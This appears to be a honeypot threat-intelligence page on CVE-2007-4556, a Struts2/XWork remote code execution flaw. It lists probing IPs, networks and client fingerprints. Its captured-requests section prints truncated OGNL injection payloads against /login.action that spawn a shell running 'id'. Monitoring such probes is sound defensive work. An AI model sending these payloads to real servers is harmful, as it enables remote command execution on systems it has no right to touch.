CVE-2007-4556: OpenSymphony XWork/Apache Struts2 - Remote Code Execution
HoneyLabs honeypots recorded 21 probes matching CVE-2007-4556 from 10 distinct source IP addresses in the last 7 days. Severity is rated medium.
Request paths that identify it
- /login.action
Addresses probing it
| Source IP | Probes | Network | Country |
|---|---|---|---|
| 109.224.17.213 | 12 | Hulum Almustakbal Company for Communication Engineering and Services Ltd | Iraq |
| 80.87.206.229 | 1 | OVH SAS | Russia |
| 159.223.119.46 | 1 | DigitalOcean, LLC | United States |
| 45.79.192.145 | 1 | Akamai Connected Cloud | United States |
| 134.209.53.36 | 1 | DigitalOcean, LLC | United States |
| 45.33.15.50 | 1 | Akamai Connected Cloud | United States |
| 165.22.189.163 | 1 | DigitalOcean, LLC | United States |
| 45.79.2.232 | 1 | Akamai Connected Cloud | United States |
Networks it comes from
| ASN | Organisation | Probes | Source IPs |
|---|---|---|---|
| AS203214 | Hulum Almustakbal Company for Communication Engineering and Services Ltd | 12 | 1 |
| AS63949 | Akamai Connected Cloud | 5 | 5 |
| AS14061 | DigitalOcean, LLC | 3 | 3 |
| AS16276 | OVH SAS | 1 | 1 |
Captured requests
- /login.action
- /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20…
- /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%…
- /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%…
HTTP client fingerprints (JA4H)
- ge11nn0400_88d30a62b7ad
- ge11nn0400_9c3956fad5da
- ge11nn0300_dedeb29cc523
CVE report
CVE report
Open a specific CVE from the CVE tracker.